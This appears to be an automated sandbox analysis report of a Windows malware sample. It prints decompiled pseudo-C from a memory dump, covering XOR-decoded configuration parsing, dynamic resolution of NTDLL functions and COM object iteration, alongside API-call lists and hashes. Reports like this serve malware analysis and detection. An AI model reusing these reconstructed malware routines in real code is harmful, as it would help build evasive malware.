Opcode ID: a905f9eefee853e8dc1ced62341fb5a5b19b5adef418ee3ce35d1e340cd77f4b
Instruction ID: 5f3f953ede0631df26da7330401bf7a37362ba6952e63c08cda5eb2597910df8
Opcode Fuzzy Hash: a905f9eefee853e8dc1ced62341fb5a5b19b5adef418ee3ce35d1e340cd77f4b
Instruction Fuzzy Hash: F8416A72900219FBCF31AFA8CD08A9EBBB9EF48358F054054ED04A7225D7399A15EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0137374B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0137374B(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0x137a2cc; // 0x63699bc3
				if(E01373D6B( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
					 *0x137a320 = _v12;
				}
				_t25 =  *0x137a2cc; // 0x63699bc3
				if(E01373D6B( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0x137a2cc; // 0x63699bc3
						_t31 = E0137257B(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x137a298 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0x137a2cc; // 0x63699bc3
						_t32 = E0137257B(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x137a29c = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0x137a2cc; // 0x63699bc3
						_t33 = E0137257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x137a2a0 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0x137a2cc; // 0x63699bc3
						_t34 = E0137257B(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x137a004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0x137a2cc; // 0x63699bc3
						_t35 = E0137257B(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x137a02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0x137a2cc; // 0x63699bc3
						_t36 = E0137257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E01375A4E(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E0137461D();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0x137a2cc; // 0x63699bc3
						_t37 = E0137257B(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E01375A4E(0, _t37) != 0) {
						_t90 =  *0x137a37c; // 0x79e9630
						E01376027(_t90 + 4, _t42);
					}
					_t38 =  *0x137a2d0; // 0x666d5a8
					_t18 = _t38 + 0x137b2d2; // 0x79e887a
					_t19 = _t38 + 0x137b7c4; // 0x6976612e
					 *0x137a31c = _t18;
					 *0x137a390 = _t19;
					HeapFree( *0x137a290, 0, _t74);
					L48:
					return 0;
				}
			}

0x0137374b
0x0137374e
0x0137376e
0x0137377c
0x0137377c
0x01373781
0x0137379b
0x0137393e
0x01373940
0x00000000
0x013737a1
0x013737a1
0x013737a8
0x013737be
0x013737aa
0x013737aa
0x013737b7
0x013737b7
0x013737c8
0x013737ca
0x013737d4
0x013737d9
0x013737d9
0x013737d4
0x013737e0
0x013737f6
0x013737e2
0x013737e2
0x013737ef
0x013737ef
0x013737fa
0x013737fc
0x01373806
0x0137380b
0x0137380b
0x01373806
0x01373812
0x01373828
0x01373814
0x01373814
0x01373821
0x01373821
0x0137382c
0x0137382e
0x01373838
0x0137383d
0x0137383d
0x01373838
0x01373844
0x0137385a
0x01373846
0x01373846
0x01373853
0x01373853
0x0137385e
0x01373860
0x0137386a
0x0137386f
0x0137386f
0x0137386a
0x01373876
0x0137388c
0x01373878
0x01373878
0x01373885
0x01373885
0x01373890
0x01373892
0x0137389c
0x013738a1
0x013738a1
0x0137389c
0x013738a8
0x013738be
0x013738aa
0x013738aa
0x013738b7
0x013738b7
0x013738c2
0x013738c4
0x013738c7
0x013738c8
0x013738cf
0x013738d1
0x013738d2
0x013738d2
0x013738cf
0x013738d9
0x013738ef
0x013738db
0x013738db
0x013738e8
0x013738e8
0x013738f3
0x01373901
0x0137390b
0x0137390b
0x01373910
0x01373916
0x01373923
0x01373929
0x0137392f
0x01373934
0x01373941
0x01373945
0x01373945

APIs

StrToIntExA.SHLWAPI(00000000,00000000,01372F44,?,01372F44,63699BC3,?,01372F44,63699BC3,E8FA7DD7,0137A00C,7691C740,?,?,01372F44), ref: 013737D0
StrToIntExA.SHLWAPI(00000000,00000000,01372F44,?,01372F44,63699BC3,?,01372F44,63699BC3,E8FA7DD7,0137A00C,7691C740,?,?,01372F44), ref: 01373802
StrToIntExA.SHLWAPI(00000000,00000000,01372F44,?,01372F44,63699BC3,?,01372F44,63699BC3,E8FA7DD7,0137A00C,7691C740,?,?,01372F44), ref: 01373834
StrToIntExA.SHLWAPI(00000000,00000000,01372F44,?,01372F44,63699BC3,?,01372F44,63699BC3,E8FA7DD7,0137A00C,7691C740,?,?,01372F44), ref: 01373866
StrToIntExA.SHLWAPI(00000000,00000000,01372F44,?,01372F44,63699BC3,?,01372F44,63699BC3,E8FA7DD7,0137A00C,7691C740,?,?,01372F44), ref: 01373898
HeapFree.KERNEL32(00000000,?,?,01372F44,63699BC3,?,01372F44,63699BC3,E8FA7DD7,0137A00C,7691C740,?,?,01372F44), ref: 01373934

Strings

Ut, xrefs: 01373934

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: f4da4afa9f7ef61887dc3a3a1a9ff095dc5267b649c8c05dbf315d7fa6fe85e7
Instruction ID: b13968bc826abde21f4f28de928eeeb22a5c4ff324ada4c09417c2f042888b94
Opcode Fuzzy Hash: f4da4afa9f7ef61887dc3a3a1a9ff095dc5267b649c8c05dbf315d7fa6fe85e7
Instruction Fuzzy Hash: 0F515671A10115FAE731DBBDDCC4D5FBFEDBB58744B284919E501D7208E639D904AB20

Uniqueness

Uniqueness Score: -1.00%

Function 01375AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E01375AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x137a2d0; // 0x666d5a8
				_t1 = _t9 + 0x137b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E013747BA(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x79e9631
					_t40 = E01375C4E(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t36 = E01371AF1(_t33, _t34, _t40, _a8);
						E01372A03(_t40);
						_t42 = E0137332F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E01372A03(_t36);
							_t36 = _t42;
						}
						_t43 = E01374138(_t36, _t33);
						if(_t43 != 0) {
							E01372A03(_t36);
							_t36 = _t43;
						}
					}
					E01372A03(_t28);
				}
				return _t36;
			}

0x01375ae3
0x01375ae6
0x01375ae7
0x01375aee
0x01375af5
0x01375afc
0x01375b00
0x01375b07
0x01375b0e
0x01375b13
0x01375b1b
0x01375b25
0x01375b29
0x01375b2d
0x01375b33
0x01375b38
0x01375b48
0x01375b4a
0x01375b61
0x01375b65
0x01375b68
0x01375b6d
0x01375b6d
0x01375b76
0x01375b7a
0x01375b7d
0x01375b82
0x01375b82
0x01375b7a
0x01375b85
0x01375b8a
0x01375b90

APIs

Part of subcall function 013747BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01375AFC,253D7325,00000000,00000000,?,00000000,01376301), ref: 01374821
Part of subcall function 013747BA: sprintf.NTDLL ref: 01374842

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01376301,00000000,079E9630), ref: 01375B0E
lstrlen.KERNEL32(00000000,?,00000000,01376301,00000000,079E9630), ref: 01375B16

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

strcpy.NTDLL ref: 01375B2D
lstrcat.KERNEL32(00000000,00000000), ref: 01375B38

Part of subcall function 01371AF1: lstrlen.KERNEL32(00000000,00000000,01376301,00000000,?,01375B47,00000000,01376301,?,00000000,01376301,00000000,079E9630), ref: 01371B02

Part of subcall function 01372A03: HeapFree.KERNEL32(00000000,00000000,01374072,00000000,?,?,00000000,?,?,?,?,?,?,013744AE,00000000), ref: 01372A0F

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01376301,?,00000000,01376301,00000000,079E9630), ref: 01375B55

Part of subcall function 0137332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,01375B61,00000000,?,00000000,01376301,00000000,079E9630), ref: 01373339
Part of subcall function 0137332F: _snprintf.NTDLL ref: 01373397

Strings

=, xrefs: 01375B4F

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 78aecf94ae439237abc4051e4a97180b72a85e26a2c994a73ceff00286b64ffe
Instruction ID: cd50e6a0771727ecc6a4205ffcc1df7fa0b8001e6c701526e075ec86cf82c942
Opcode Fuzzy Hash: 78aecf94ae439237abc4051e4a97180b72a85e26a2c994a73ceff00286b64ffe
Instruction Fuzzy Hash: C2115E3390112A6BD732BB6C9C84CBF7AAD9F5566C7090115F904AB204DE7CD9029BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01372BF3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 01372C4F
SysAllocString.OLEAUT32(0070006F), ref: 01372C63
SysAllocString.OLEAUT32(00000000), ref: 01372C75
SysFreeString.OLEAUT32(00000000), ref: 01372CD9
SysFreeString.OLEAUT32(00000000), ref: 01372CE8
SysFreeString.OLEAUT32(00000000), ref: 01372CF3

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: ee87fdb93a3780b0b55829efe8389a6f04af0f27b0cc062b5ba3d1b98e1fee15
Instruction ID: dd6dc619681dfe2704f285410aceec2bad9f784eed54e58675673bf60345f8e0
Opcode Fuzzy Hash: ee87fdb93a3780b0b55829efe8389a6f04af0f27b0cc062b5ba3d1b98e1fee15
Instruction Fuzzy Hash: DC314032D0060AAFDF21DFACC948A9FBBBAAF49314F144465EE10FB114DB759A05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013771A3, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013771A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E01375C4E(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x137a2d0; // 0x666d5a8
					_t1 = _t23 + 0x137b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x137a2d0; // 0x666d5a8
					_t2 = _t26 + 0x137b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E01372A03(_t54);
					} else {
						_t30 =  *0x137a2d0; // 0x666d5a8
						_t5 = _t30 + 0x137b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x137a2d0; // 0x666d5a8
							_t7 = _t33 + 0x137b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x137a2d0; // 0x666d5a8
								_t9 = _t36 + 0x137b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x137a2d0; // 0x666d5a8
									_t11 = _t39 + 0x137b7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0137225C(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x013771b2
0x013771b6
0x01377278
0x013771bc
0x013771bc
0x013771c1
0x013771d4
0x013771d6
0x013771db
0x013771e3
0x013771ea
0x013771ee
0x013771f1
0x01377270
0x01377271
0x013771f3
0x013771f3
0x013771f8
0x01377200
0x01377204
0x01377207
0x00000000
0x01377209
0x01377209
0x0137720e
0x01377216
0x0137721a
0x0137721d
0x00000000
0x0137721f
0x0137721f
0x01377224
0x0137722c
0x01377230
0x01377233
0x00000000
0x01377235
0x01377235
0x0137723a
0x01377242
0x01377246
0x01377249
0x00000000
0x0137724b
0x01377251
0x01377256
0x0137725d
0x01377264
0x01377267
0x00000000
0x01377269
0x0137726c
0x0137726c
0x01377267
0x01377249
0x01377233
0x0137721d
0x01377207
0x013771f1
0x01377286

APIs

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,01377852,?,?,?,?,00000000,00000000), ref: 013771C8
GetProcAddress.KERNEL32(00000000,7243775A), ref: 013771EA
GetProcAddress.KERNEL32(00000000,614D775A), ref: 01377200
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01377216
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0137722C
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01377242

Part of subcall function 0137225C: memset.NTDLL ref: 013722DB

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: f85e58e3969c5585dfe161ce3753c62511852e13481eace702ddb6f584034555
Instruction ID: bebcbd813441ad50f1e7b303b8bb759350c181616c22b1e02e5b12fcadf95b9d
Opcode Fuzzy Hash: f85e58e3969c5585dfe161ce3753c62511852e13481eace702ddb6f584034555
Instruction Fuzzy Hash: B8211CB150020AEFDB30DFA9CD48E9ABBFCEB04344F054129E615D7255E635E9058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 013713B4, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E013713B4(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x137a2d0; // 0x666d5a8
					_t5 = _t102 + 0x137b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x13792d0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x137a2d0; // 0x666d5a8
												_t28 = _t108 + 0x137b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x137a2d0; // 0x666d5a8
														_t33 = _t78 + 0x137b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x013713b9
0x013713c2
0x013713c3
0x013713c7
0x013713cd
0x013713d3
0x013713dc
0x013713e2
0x013713ec
0x013713ee
0x013713f4
0x013713f9
0x01371404
0x0137140c
0x0137140f
0x01371532
0x01371415
0x01371415
0x01371422
0x01371428
0x0137142e
0x01371432
0x01371438
0x01371445
0x01371449
0x0137144f
0x01371452
0x01371458
0x0137145e
0x01371464
0x01371467
0x0137146a
0x01371470
0x01371479
0x0137147f
0x01371480
0x01371483
0x01371484
0x01371485
0x0137148d
0x0137148e
0x0137148f
0x01371491
0x01371495
0x01371499
0x00000000
0x00000000
0x0137149f
0x013714a8
0x013714ae
0x013714b8
0x013714bc
0x013714be
0x013714cb
0x013714cf
0x013714d7
0x013714dc
0x013714ee
0x013714f0
0x013714f6
0x013714f6
0x013714ff
0x013714ff
0x01371501
0x01371507
0x01371507
0x0137150a
0x01371510
0x01371513
0x0137151c
0x00000000
0x00000000
0x00000000
0x0137151c
0x01371470
0x0137146a
0x01371452
0x01371522
0x01371522
0x01371528
0x01371528
0x0137152e
0x0137152e
0x01371537
0x0137153d
0x0137153d
0x013713f9
0x01371546

APIs

SysAllocString.OLEAUT32(013792D0), ref: 01371404
lstrcmpW.KERNEL32(00000000,0076006F), ref: 013714E6
SysFreeString.OLEAUT32(00000000), ref: 013714FF
SysFreeString.OLEAUT32(?), ref: 0137152E

Strings

ht, xrefs: 013714E6

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID: ht
API String ID: 1885612795-2699322969
Opcode ID: a873e553b489ad3966546e8a86d47ffd7c6dc0533864db8779bd452ca1c78842
Instruction ID: cac360e26d0430203627f125a56635b5c6cd2b04177b1e0da29f7930ec1418e4
Opcode Fuzzy Hash: a873e553b489ad3966546e8a86d47ffd7c6dc0533864db8779bd452ca1c78842
Instruction Fuzzy Hash: AC516F76D0050ADFCB25DFA8C4888AEF7B9FF88718B144588E916EB214D735AD01CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013763CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E013763CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E01372BF3(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x137a2d0; // 0x666d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x137b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x137b92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x137a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x013763cd
0x013763d4
0x013763d8
0x013763dd
0x013763e4
0x013763e7
0x013763f1
0x013763f6
0x01376402
0x01376409
0x01376413
0x01376413
0x0137640b
0x0137640b
0x0137640b
0x0137640b
0x01376419
0x0137641c
0x01376424
0x01376427
0x0137642a
0x0137642d
0x01376432
0x0137643b
0x01376448
0x0137643d
0x01376443
0x01376443
0x0137644e
0x0137644e
0x01376456

APIs

Part of subcall function 01372BF3: SysAllocString.OLEAUT32(?), ref: 01372C4F
Part of subcall function 01372BF3: SysAllocString.OLEAUT32(0070006F), ref: 01372C63
Part of subcall function 01372BF3: SysAllocString.OLEAUT32(00000000), ref: 01372C75
Part of subcall function 01372BF3: SysFreeString.OLEAUT32(00000000), ref: 01372CD9

memset.NTDLL ref: 013763F1
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0137642D
GetLastError.KERNEL32 ref: 0137643D
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 0137644E

Strings

<, xrefs: 01376402

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 6bdada846ac8d46913c2da34d953c72c9e0f54ca1cb81d772c0daf0aef971611
Instruction ID: a6ee45692aee07a754c37a21aad586e9d9e98096d7383188547a538c109196f2
Opcode Fuzzy Hash: 6bdada846ac8d46913c2da34d953c72c9e0f54ca1cb81d772c0daf0aef971611
Instruction Fuzzy Hash: 2111DEB1900218AFEB30DFA9D899BDD7BFCBB08798F048026E905E7241D7789544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01376027, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E01376027(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x137a37c; // 0x79e9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x137a37c; // 0x79e9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x137a030) {
					HeapFree( *0x137a290, 0, _t8);
				}
				_t14[1] = E013749BA(_v0);
				_t11 =  *0x137a37c; // 0x79e9630
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}

0x01376027
0x01376027
0x01376030
0x01376040
0x01376040
0x01376045
0x0137604a
0x00000000
0x00000000
0x0137603a
0x0137603a
0x0137604c
0x01376050
0x01376062
0x01376062
0x01376072
0x01376075
0x0137607a
0x0137607e
0x01376084

APIs

RtlEnterCriticalSection.NTDLL(079E95F0), ref: 01376030
Sleep.KERNEL32(0000000A,?,?,01372F44,?,?,?,?,?,013744F9,?,00000001), ref: 0137603A
HeapFree.KERNEL32(00000000,00000000,?,?,01372F44,?,?,?,?,?,013744F9,?,00000001), ref: 01376062
RtlLeaveCriticalSection.NTDLL(079E95F0), ref: 0137607E

Strings

Ut, xrefs: 01376062

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 869fa0b64b6964ccf57280b375fa7bbf8410ec3ac7465fde3eb591de887824f5
